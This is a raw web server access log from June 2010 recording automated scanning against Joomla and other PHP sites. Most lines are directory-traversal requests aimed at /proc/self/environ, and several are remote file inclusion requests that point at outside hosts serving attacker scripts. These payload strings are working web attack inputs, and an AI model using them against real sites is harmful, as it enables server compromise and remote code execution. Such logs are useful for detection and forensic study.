62.44.82.118 - - [13/Jun/2010:06:12:50 -0500] "GET /logs//////index.php?option=com_alphauserpoints&view=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 303 "-""libwww-perl/5.803"
62.44.82.118 - - [13/Jun/2010:06:12:51 -0500] "GET //////index.php?option=com_alphauserpoints&view=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 298 "-""libwww-perl/5.803"
174.121.188.69 - - [13/Jun/2010:06:13:51 -0500] "GET /logs/access_log.1274572800//////index.php?option=com_alphauserpoints&view=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 325 "-""libwww-perl/5.810"
62.44.82.118 - - [13/Jun/2010:06:14:18 -0500] "GET /logs/access_log.1274832000//////index.php?option=com_alphauserpoints&view=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 325 "-""libwww-perl/5.803"
178.63.27.83 - - [13/Jun/2010:06:14:19 -0500] "GET /logs/access_log.1274572800//////index.php?option=com_alphauserpoints&view=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 325 "-""libwww-perl/5.813"
178.63.27.83 - - [13/Jun/2010:06:14:19 -0500] "GET //////index.php?option=com_alphauserpoints&view=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 298 "-""libwww-perl/5.813"
62.44.82.118 - - [13/Jun/2010:06:14:19 -0500] "GET //////index.php?option=com_alphauserpoints&view=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 298 "-""libwww-perl/5.803"
178.63.27.83 - - [13/Jun/2010:06:14:19 -0500] "GET /logs//////index.php?option=com_alphauserpoints&view=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 303 "-""libwww-perl/5.813"
62.44.82.118 - - [13/Jun/2010:06:14:19 -0500] "GET /logs//////index.php?option=com_alphauserpoints&view=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 303 "-""libwww-perl/5.803"
62.44.82.118 - - [13/Jun/2010:06:14:20 -0500] "GET /logs/access_log.1274572800//////index.php?option=com_alphauserpoints&view=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 325 "-""libwww-perl/5.803"
219.240.36.36 - - [13/Jun/2010:06:14:40 -0500] "GET /logs/access_log.1274572800/index.php?option=com_jfeedback&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 320 "-""libwww-perl/5.65"
219.240.36.36 - - [13/Jun/2010:06:14:40 -0500] "GET /index.php?option=com_jfeedback&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 293 "-""libwww-perl/5.65"
219.240.36.36 - - [13/Jun/2010:06:14:41 -0500] "GET /logs/index.php?option=com_jfeedback&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 298 "-""libwww-perl/5.65"
219.240.36.36 - - [13/Jun/2010:06:14:42 -0500] "GET /logs/access_log.1274832000/index.php?option=com_jfeedback&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 320 "-""libwww-perl/5.65"
62.44.82.118 - - [13/Jun/2010:06:15:09 -0500] "GET /logs/access_log.1274832000//////index.php?option=com_alphauserpoints&view=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 325 "-""libwww-perl/5.803"
62.44.82.118 - - [13/Jun/2010:06:15:09 -0500] "GET //////index.php?option=com_alphauserpoints&view=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 298 "-""libwww-perl/5.803"
62.44.82.118 - - [13/Jun/2010:06:15:10 -0500] "GET /logs//////index.php?option=com_alphauserpoints&view=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 303 "-""libwww-perl/5.803"
62.44.82.118 - - [13/Jun/2010:06:15:48 -0500] "GET /logs/access_log.1274572800//////index.php?option=com_alphauserpoints&view=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 325 "-""libwww-perl/5.803"
62.44.82.118 - - [13/Jun/2010:06:15:49 -0500] "GET //////index.php?option=com_alphauserpoints&view=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 298 "-""libwww-perl/5.803"
62.44.82.118 - - [13/Jun/2010:06:15:49 -0500] "GET /logs//////index.php?option=com_alphauserpoints&view=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 303 "-""libwww-perl/5.803"
178.63.27.83 - - [13/Jun/2010:06:17:09 -0500] "GET /logs/access_log.1274832000//////index.php?option=com_alphauserpoints&view=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 325 "-""libwww-perl/5.813"
87.106.183.116 - - [13/Jun/2010:06:17:22 -0500] "GET /logs//index.php?option=com_mtfireeagle&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 299 "-""libwww-perl/5.805"
87.106.183.116 - - [13/Jun/2010:06:17:22 -0500] "GET //index.php?option=com_mtfireeagle&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 294 "-""libwww-perl/5.805"
62.210.190.230 - - [13/Jun/2010:06:19:42 -0500] "GET /logs//index.php?option=com_mtfireeagle&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 299 "-""libwww-perl/5.65"
62.210.190.230 - - [13/Jun/2010:06:19:42 -0500] "GET //index.php?option=com_mtfireeagle&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 294 "-""libwww-perl/5.65"
87.106.183.116 - - [13/Jun/2010:06:23:32 -0500] "GET /logs/access_log.1274572800//index.php?option=com_mtfireeagle&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 321 "-""libwww-perl/5.805"
87.106.183.116 - - [13/Jun/2010:06:23:32 -0500] "GET //index.php?option=com_mtfireeagle&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 294 "-""libwww-perl/5.805"
87.106.183.116 - - [13/Jun/2010:06:23:33 -0500] "GET /logs//index.php?option=com_mtfireeagle&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 299 "-""libwww-perl/5.805"
188.72.70.56 - - [13/Jun/2010:06:26:36 -0500] "GET /logs/components/com_colorlab/admin~color~php?mosConfig_live_site=http://www.ysymca.or.kr/bbs/icon/fx1.txt??? HTTP/1.1" 404 328 "-""Mozilla/5.0"
188.72.70.56 - - [13/Jun/2010:06:26:36 -0500] "GET /components/com_colorlab/admin~color~php?mosConfig_live_site=http://www.ysymca.or.kr/bbs/icon/fx1.txt??? HTTP/1.1" 404 323 "-""Mozilla/5.0"
188.72.70.56 - - [13/Jun/2010:06:26:36 -0500] "GET /logs/access_log.1271548800/components/com_colorlab/admin~color~php?mosConfig_live_site=http://www.ysymca.or.kr/bbs/icon/fx1.txt??? HTTP/1.1" 404 350 "-""Mozilla/5.0"
62.44.82.118 - - [13/Jun/2010:06:27:20 -0500] "GET /logs/access_log.1274572800//////index.php?option=com_alphauserpoints&view=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 325 "-""libwww-perl/5.803"
62.44.82.118 - - [13/Jun/2010:06:27:20 -0500] "GET //////index.php?option=com_alphauserpoints&view=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 298 "-""libwww-perl/5.803"
62.44.82.118 - - [13/Jun/2010:06:27:20 -0500] "GET /logs//////index.php?option=com_alphauserpoints&view=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 303 "-""libwww-perl/5.803"
62.44.82.118 - - [13/Jun/2010:06:27:31 -0500] "GET /logs/access_log.1274572800//////index.php?option=com_alphauserpoints&view=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 325 "-""libwww-perl/5.803"
62.44.82.118 - - [13/Jun/2010:06:27:31 -0500] "GET //////index.php?option=com_alphauserpoints&view=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 298 "-""libwww-perl/5.803"
62.44.82.118 - - [13/Jun/2010:06:27:31 -0500] "GET /logs//////index.php?option=com_alphauserpoints&view=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 303 "-""libwww-perl/5.803"
62.44.82.118 - - [13/Jun/2010:06:27:46 -0500] "GET /logs/access_log.1274832000//////index.php?option=com_alphauserpoints&view=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 325 "-""libwww-perl/5.803"
62.44.82.118 - - [13/Jun/2010:06:27:58 -0500] "GET /logs/access_log.1274832000//////index.php?option=com_alphauserpoints&view=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 325 "-""libwww-perl/5.803"
67.205.85.5 - - [13/Jun/2010:06:28:34 -0500] "GET //index.php?option=com_myblog&Itemid=12&task=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 294 "-""libwww-perl/5.834"
67.205.85.5 - - [13/Jun/2010:06:28:40 -0500] "GET //index.php?option=com_myblog&Itemid=12&task=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 294 "-""libwww-perl/5.834"
67.205.85.5 - - [13/Jun/2010:06:29:02 -0500] "GET /logs/access_log.1274572800//index.php?option=com_myblog&Itemid=12&task=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 321 "-""libwww-perl/5.834"
67.205.85.5 - - [13/Jun/2010:06:29:02 -0500] "GET //index.php?option=com_myblog&Itemid=12&task=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 294 "-""libwww-perl/5.834"
67.205.85.5 - - [13/Jun/2010:06:29:02 -0500] "GET /logs//index.php?option=com_myblog&Itemid=12&task=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 299 "-""libwww-perl/5.834"
67.205.85.5 - - [13/Jun/2010:06:29:04 -0500] "GET /logs/access_log.1274572800//index.php?option=com_myblog&Itemid=12&task=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 321 "-""libwww-perl/5.834"
67.205.85.5 - - [13/Jun/2010:06:29:04 -0500] "GET //index.php?option=com_myblog&Itemid=12&task=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 294 "-""libwww-perl/5.834"
67.205.85.5 - - [13/Jun/2010:06:29:04 -0500] "GET /logs//index.php?option=com_myblog&Itemid=12&task=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 299 "-""libwww-perl/5.834"
174.133.201.194 - - [13/Jun/2010:06:29:14 -0500] "GET /index.php?option=com_myblog&Itemid=1&task=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 293 "-""libwww-perl/5.834"
67.205.85.5 - - [13/Jun/2010:06:29:21 -0500] "GET /logs/access_log.1274572800//index.php?option=com_myblog&Itemid=12&task=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 321 "-""libwww-perl/5.834"
67.205.85.5 - - [13/Jun/2010:06:29:21 -0500] "GET //index.php?option=com_myblog&Itemid=12&task=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 294 "-""libwww-perl/5.834"
67.205.85.5 - - [13/Jun/2010:06:29:21 -0500] "GET /logs//index.php?option=com_myblog&Itemid=12&task=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 299 "-""libwww-perl/5.834"
67.205.85.5 - - [13/Jun/2010:06:29:22 -0500] "GET /logs/access_log.1274572800//index.php?option=com_myblog&Itemid=12&task=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 321 "-""libwww-perl/5.834"
67.205.85.5 - - [13/Jun/2010:06:29:22 -0500] "GET //index.php?option=com_myblog&Itemid=12&task=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 294 "-""libwww-perl/5.834"
67.205.85.5 - - [13/Jun/2010:06:29:22 -0500] "GET /logs//index.php?option=com_myblog&Itemid=12&task=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 299 "-""libwww-perl/5.834"
24.77.166.66 - - [13/Jun/2010:06:31:21 -0500] "GET /index.php?option=com_myblog&Itemid=1&task=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 293 "-""libwww-perl/5.805"
24.77.166.66 - - [13/Jun/2010:06:31:26 -0500] "GET /index.php?option=com_myblog&Itemid=1&task=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 293 "-""libwww-perl/5.805"
70.85.9.58 - - [13/Jun/2010:06:32:33 -0500] "GET /logs//xcart/customer/giftcert?xcart_dir=http://fr.webmaster-rank.info/header/myid.jpg? HTTP/1.1" 404 313 "-""libwww-perl/5.826"
70.85.9.58 - - [13/Jun/2010:06:32:33 -0500] "GET //xcart/customer/giftcert?xcart_dir=http://fr.webmaster-rank.info/header/myid.jpg? HTTP/1.1" 404 308 "-""libwww-perl/5.826"
72.52.150.147 - - [13/Jun/2010:06:32:36 -0500] "GET /logs/index.php?option=com_dwgraphs&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 298 "-""libwww-perl/5.831"
72.52.150.147 - - [13/Jun/2010:06:32:36 -0500] "GET /index.php?option=com_dwgraphs&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 293 "-""libwww-perl/5.831"
72.52.150.147 - - [13/Jun/2010:06:33:02 -0500] "GET /index.php?option=com_dwgraphs&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 293 "-""libwww-perl/5.831"
67.205.85.5 - - [13/Jun/2010:06:33:24 -0500] "GET /logs/access_log.1274832000//index.php?option=com_myblog&Itemid=12&task=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 321 "-""libwww-perl/5.834"
67.205.85.5 - - [13/Jun/2010:06:33:26 -0500] "GET /logs/access_log.1274832000//index.php?option=com_myblog&Itemid=12&task=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 321 "-""libwww-perl/5.834"
67.195.112.180 - - [13/Jun/2010:06:33:32 -0500] "GET /logs/access_log.1238371200 HTTP/1.0" 404 298 "-""Mozilla/5.0 (compatible; Yahoo! Slurp/3.0; http://help.yahoo.com/help/us/ysearch/slurp)"
74.124.198.168 - - [13/Jun/2010:06:34:17 -0500] "GET /index.php?option=com_myblog&Itemid=1&task=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 293 "-""libwww-perl/5.810"
87.106.183.116 - - [13/Jun/2010:06:35:12 -0500] "GET /logs//index.php?option=com_bsq_sitestats&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 299 "-""libwww-perl/5.805"
87.106.183.116 - - [13/Jun/2010:06:35:13 -0500] "GET //index.php?option=com_bsq_sitestats&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 294 "-""libwww-perl/5.805"
207.58.183.16 - - [13/Jun/2010:06:35:47 -0500] "GET /logs//index.php?option=com_bsq_sitestats&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 299 "-""libwww-perl/5.810"
207.58.183.16 - - [13/Jun/2010:06:35:47 -0500] "GET //index.php?option=com_bsq_sitestats&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 294 "-""libwww-perl/5.810"
121.190.102.21 - - [13/Jun/2010:06:36:43 -0500] "GET /logs/access_log.1271548800//gnu/bbs/delete.php///delete_comment.php?board_skin_path=http://iies.ca/xmlrpc/cache/id1.txt? HTTP/1.1" 404 351 "-""Mozilla/5.0"
121.190.102.21 - - [13/Jun/2010:06:36:43 -0500] "GET //gnu/bbs/delete.php///delete_comment.php?board_skin_path=http://iies.ca/xmlrpc/cache/id1.txt? HTTP/1.1" 404 324 "-""Mozilla/5.0"
121.190.102.21 - - [13/Jun/2010:06:36:43 -0500] "GET /logs//gnu/bbs/delete.php///delete_comment.php?board_skin_path=http://iies.ca/xmlrpc/cache/id1.txt? HTTP/1.1" 404 329 "-""Mozilla/5.0"
72.52.150.147 - - [13/Jun/2010:06:36:43 -0500] "GET /logs/access_log.1274832000/index.php?option=com_dwgraphs&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 320 "-""libwww-perl/5.831"
72.52.150.147 - - [13/Jun/2010:06:36:43 -0500] "GET /index.php?option=com_dwgraphs&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 293 "-""libwww-perl/5.831"
72.52.150.147 - - [13/Jun/2010:06:36:44 -0500] "GET /logs/index.php?option=com_dwgraphs&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 298 "-""libwww-perl/5.831"
121.190.102.21 - - [13/Jun/2010:06:36:46 -0500] "GET //gnu/bbs/delete.php///delete_comment.php?board_skin_path=http://iies.ca/xmlrpc/cache/id1.txt? HTTP/1.1" 404 324 "-""Mozilla/5.0"
121.190.102.21 - - [13/Jun/2010:06:36:46 -0500] "GET /logs//gnu/bbs/delete.php///delete_comment.php?board_skin_path=http://iies.ca/xmlrpc/cache/id1.txt? HTTP/1.1" 404 329 "-""Mozilla/5.0"
121.190.102.21 - - [13/Jun/2010:06:36:46 -0500] "GET /logs/access_log.1271548800//gnu/bbs/delete.php///delete_comment.php?board_skin_path=http://iies.ca/xmlrpc/cache/id1.txt? HTTP/1.1" 404 351 "-""Mozilla/5.0"
72.52.150.147 - - [13/Jun/2010:06:36:59 -0500] "GET /logs/access_log.1274572800/index.php?option=com_dwgraphs&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 320 "-""libwww-perl/5.831"
87.106.183.116 - - [13/Jun/2010:06:37:41 -0500] "GET /logs//index.php?option=com_foobla_suggestions&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 299 "-""libwww-perl/5.805"
87.106.183.116 - - [13/Jun/2010:06:37:41 -0500] "GET //index.php?option=com_foobla_suggestions&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 294 "-""libwww-perl/5.805"
216.59.0.167 - - [13/Jun/2010:06:37:55 -0500] "GET /index.php?option=com_hsconfig&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 293 "-""libwww-perl/5.810"
216.59.0.167 - - [13/Jun/2010:06:38:07 -0500] "GET /logs/index.php?option=com_hsconfig&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 298 "-""libwww-perl/5.810"
216.59.0.167 - - [13/Jun/2010:06:38:07 -0500] "GET /index.php?option=com_hsconfig&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 293 "-""libwww-perl/5.810"
216.59.0.167 - - [13/Jun/2010:06:38:10 -0500] "GET /logs/index.php?option=com_hsconfig&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 298 "-""libwww-perl/5.810"
216.59.0.167 - - [13/Jun/2010:06:38:10 -0500] "GET /index.php?option=com_hsconfig&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 293 "-""libwww-perl/5.810"
216.59.0.167 - - [13/Jun/2010:06:38:14 -0500] "GET /index.php?option=com_hsconfig&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 293 "-""libwww-perl/5.810"
94.23.197.156 - - [13/Jun/2010:06:39:09 -0500] "GET /logs//index.php?option=com_ninjarsssyndicator&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 299 "-""libwww-perl/5.803"
94.23.197.156 - - [13/Jun/2010:06:39:09 -0500] "GET //index.php?option=com_ninjarsssyndicator&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 294 "-""libwww-perl/5.803"
62.210.190.230 - - [13/Jun/2010:06:39:54 -0500] "GET /logs//index.php?option=com_bsq_sitestats&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 299 "-""libwww-perl/5.65"
62.210.190.230 - - [13/Jun/2010:06:39:54 -0500] "GET //index.php?option=com_bsq_sitestats&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 294 "-""libwww-perl/5.65"
219.240.36.36 - - [13/Jun/2010:06:39:59 -0500] "GET /index.php?option=com_hsconfig&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 293 "-""libwww-perl/5.65"
219.240.36.36 - - [13/Jun/2010:06:40:21 -0500] "GET /logs/access_log.1274572800/*?option=com_fabrik&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 312 "-""libwww-perl/5.65"
219.240.36.36 - - [13/Jun/2010:06:40:22 -0500] "GET /*?option=com_fabrik&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 285 "-""libwww-perl/5.65"
219.240.36.36 - - [13/Jun/2010:06:40:22 -0500] "GET /logs/*?option=com_fabrik&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 290 "-""libwww-perl/5.65"
24.77.166.66 - - [13/Jun/2010:06:40:37 -0500] "GET /index2.php?option=com_myblog&Itemid=1&task=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 294 "-""libwww-perl/5.805"
24.77.166.66 - - [13/Jun/2010:06:40:45 -0500] "GET /index2.php?option=com_myblog&Itemid=1&task=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 294 "-""libwww-perl/5.805"
74.124.198.168 - - [13/Jun/2010:06:40:46 -0500] "GET /index2.php?option=com_myblog&Itemid=1&task=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 294 "-""libwww-perl/5.810"
216.59.0.167 - - [13/Jun/2010:06:41:00 -0500] "GET /logs/access_log.1274572800/index.php?option=com_hsconfig&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 320 "-""libwww-perl/5.810"
216.59.0.167 - - [13/Jun/2010:06:41:00 -0500] "GET /index.php?option=com_hsconfig&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 293 "-""libwww-perl/5.810"
216.59.0.167 - - [13/Jun/2010:06:41:01 -0500] "GET /logs/index.php?option=com_hsconfig&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 298 "-""libwww-perl/5.810"
122.252.7.141 - - [13/Jun/2010:06:42:24 -0500] "GET /logs//index.php?option=com_ninjarsssyndicator&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 299 "-""libwww-perl/5.831"
122.252.7.141 - - [13/Jun/2010:06:42:24 -0500] "GET //index.php?option=com_ninjarsssyndicator&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 294 "-""libwww-perl/5.831"
216.59.0.167 - - [13/Jun/2010:06:42:26 -0500] "GET /logs/access_log.1274572800/index.php?option=com_hsconfig&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 320 "-""libwww-perl/5.810"
216.59.0.167 - - [13/Jun/2010:06:42:26 -0500] "GET /index.php?option=com_hsconfig&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 293 "-""libwww-perl/5.810"
216.59.0.167 - - [13/Jun/2010:06:42:26 -0500] "GET /logs/index.php?option=com_hsconfig&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 298 "-""libwww-perl/5.810"
216.59.0.167 - - [13/Jun/2010:06:42:41 -0500] "GET /logs/access_log.1274832000/index.php?option=com_hsconfig&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 320 "-""libwww-perl/5.810"
216.59.0.167 - - [13/Jun/2010:06:43:24 -0500] "GET /logs/access_log.1274832000/index.php?option=com_hsconfig&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 320 "-""libwww-perl/5.810"
87.106.183.116 - - [13/Jun/2010:06:43:30 -0500] "GET /logs//index.php?option=com_redtwitter&view=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 299 "-""libwww-perl/5.805"
87.106.183.116 - - [13/Jun/2010:06:43:31 -0500] "GET //index.php?option=com_redtwitter&view=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 294 "-""libwww-perl/5.805"
87.106.183.116 - - [13/Jun/2010:06:43:37 -0500] "GET /logs//index.php?option=com_webeecomment&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 299 "-""libwww-perl/5.805"
87.106.183.116 - - [13/Jun/2010:06:43:37 -0500] "GET //index.php?option=com_webeecomment&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 294 "-""libwww-perl/5.805"
200.201.180.130 - - [13/Jun/2010:06:44:33 -0500] "GET /?sourcedir=http://solid.go.ro/d1.txt?? HTTP/1.1" 200 1003 "-""Mozilla/5.0"
200.201.180.130 - - [13/Jun/2010:06:44:33 -0500] "GET /logs/?sourcedir=http://solid.go.ro/d1.txt?? HTTP/1.1" 200 9328 "-""Mozilla/5.0"
200.201.180.130 - - [13/Jun/2010:06:44:33 -0500] "GET /logs/access_log.1271548800/?sourcedir=http://solid.go.ro/d1.txt?? HTTP/1.1" 404 311 "-""Mozilla/5.0"
62.210.190.230 - - [13/Jun/2010:06:44:43 -0500] "GET /logs//index.php?option=com_foobla_suggestions&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 299 "-""libwww-perl/5.65"
62.210.190.230 - - [13/Jun/2010:06:44:43 -0500] "GET //index.php?option=com_foobla_suggestions&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 294 "-""libwww-perl/5.65"
87.106.183.116 - - [13/Jun/2010:06:44:46 -0500] "GET /logs//index.php?option=com_redshop&view=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 299 "-""libwww-perl/5.805"
87.106.183.116 - - [13/Jun/2010:06:44:46 -0500] "GET //index.php?option=com_redshop&view=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 294 "-""libwww-perl/5.805"
87.106.183.116 - - [13/Jun/2010:06:45:03 -0500] "GET /logs//index.php?option=com_jinventory&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 299 "-""libwww-perl/5.805"
87.106.183.116 - - [13/Jun/2010:06:45:03 -0500] "GET //index.php?option=com_jinventory&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 294 "-""libwww-perl/5.805"
59.42.10.71 - - [13/Jun/2010:06:46:41 -0500] "GET /index.php?option=com_hsconfig&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 293 "-""libwww-perl/5.831"
59.42.10.71 - - [13/Jun/2010:06:46:59 -0500] "GET /index.php?option=com_hsconfig&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 293 "-""libwww-perl/5.831"
66.71.188.11 - - [13/Jun/2010:06:47:02 -0500] "GET /logs/index.php?option=com_hsconfig&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 298 "-""libwww-perl/5.831"
66.71.188.11 - - [13/Jun/2010:06:47:03 -0500] "GET /index.php?option=com_hsconfig&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 293 "-""libwww-perl/5.831"
62.210.190.230 - - [13/Jun/2010:06:47:22 -0500] "GET /logs//index.php?option=com_jinventory&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 299 "-""libwww-perl/5.65"
62.210.190.230 - - [13/Jun/2010:06:47:22 -0500] "GET //index.php?option=com_jinventory&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 294 "-""libwww-perl/5.65"
59.42.10.71 - - [13/Jun/2010:06:47:24 -0500] "GET /index.php?option=com_hsconfig&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 293 "-""libwww-perl/5.831"
66.71.188.11 - - [13/Jun/2010:06:47:31 -0500] "GET /logs/index.php?option=com_hsconfig&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 298 "-""libwww-perl/5.831"
66.71.188.11 - - [13/Jun/2010:06:47:32 -0500] "GET /index.php?option=com_hsconfig&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 293 "-""libwww-perl/5.831"
66.71.188.11 - - [13/Jun/2010:06:48:12 -0500] "GET /index.php?option=com_hsconfig&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 293 "-""libwww-perl/5.831"
66.71.188.11 - - [13/Jun/2010:06:48:31 -0500] "GET /index.php?option=com_hsconfig&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 293 "-""libwww-perl/5.831"
122.201.90.71 - - [13/Jun/2010:06:49:13 -0500] "GET //index.php?option=com_gcalendar&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 294 "-""libwww-perl/5.823"
219.240.36.36 - - [13/Jun/2010:06:49:42 -0500] "GET /logs/access_log.1274572800/index.php?option=com_hsconfig&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 320 "-""libwww-perl/5.65"
219.240.36.36 - - [13/Jun/2010:06:49:42 -0500] "GET /index.php?option=com_hsconfig&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 293 "-""libwww-perl/5.65"
